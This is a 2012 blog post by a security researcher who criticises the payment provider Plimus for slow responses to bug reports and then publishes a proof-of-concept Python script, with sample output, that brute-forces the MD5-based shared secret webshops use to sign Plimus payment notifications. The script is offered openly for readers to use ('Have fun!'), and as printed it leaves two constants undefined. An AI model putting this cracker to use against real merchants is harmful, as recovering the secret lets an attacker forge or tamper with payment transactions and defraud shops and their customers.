Howto crack Plimus "MD5hex encryption"

Floor Terra - 2012-02-24 15:28:00
It's been a while since I have reported a few security bugs to Plimus. It took a few blogposts explaining the issues publicly before I got in contact with an engineer. I understand that making backwards incompatible changes to your customer facing API's is not a trivial task, however the way Plimus handles these issues is just terrible.

One engineer asks me for more feedback while in the same mail thread another Plimus employee demands proof I'm PCI certified and wants to know what applications I'm going to build before I get access to the test API of Plimus. If you don't even let me test security bugs before I report them you won't get the bugreport at all. Maybe I can test them after you have gone live and customers already depend on the API.

The first actual promised date for a simple fix passed five days ago. Since then I have gotten no response. They even refused to acknowledge in advance what exactly they where going to fix.

For your enjoyment I have written proof of concept code that you can use to crack the shared secret between Plimus and a webshop. This secret is the only security with which transactions between a webshop and Plimus are signed and authenticated. Have fun!

Once you have the reply a webshop gives to a Plimus IPN (in this example "8c083afc16dfe31e5d92a6358f33297d"), you can recover the key like this:
$ python 8c083afc16dfe31e5d92a6358f33297d
Trying length 1
Trying length 2
Trying length 3
Trying length 4
Data Protection Key: SCRT

And the sourcecode:
#!/usr/bin/env python


import sys
from md5 import md5
from itertools import product

target = sys.argv[1]

for length in range(1, MAXLENGTH+1):
    print "Trying length", length
    for password in product(CHARSET, repeat=length):
        if target == md5("OK"+"".join(password)).hexdigest():
            print "Data Protection Key:", "".join(password)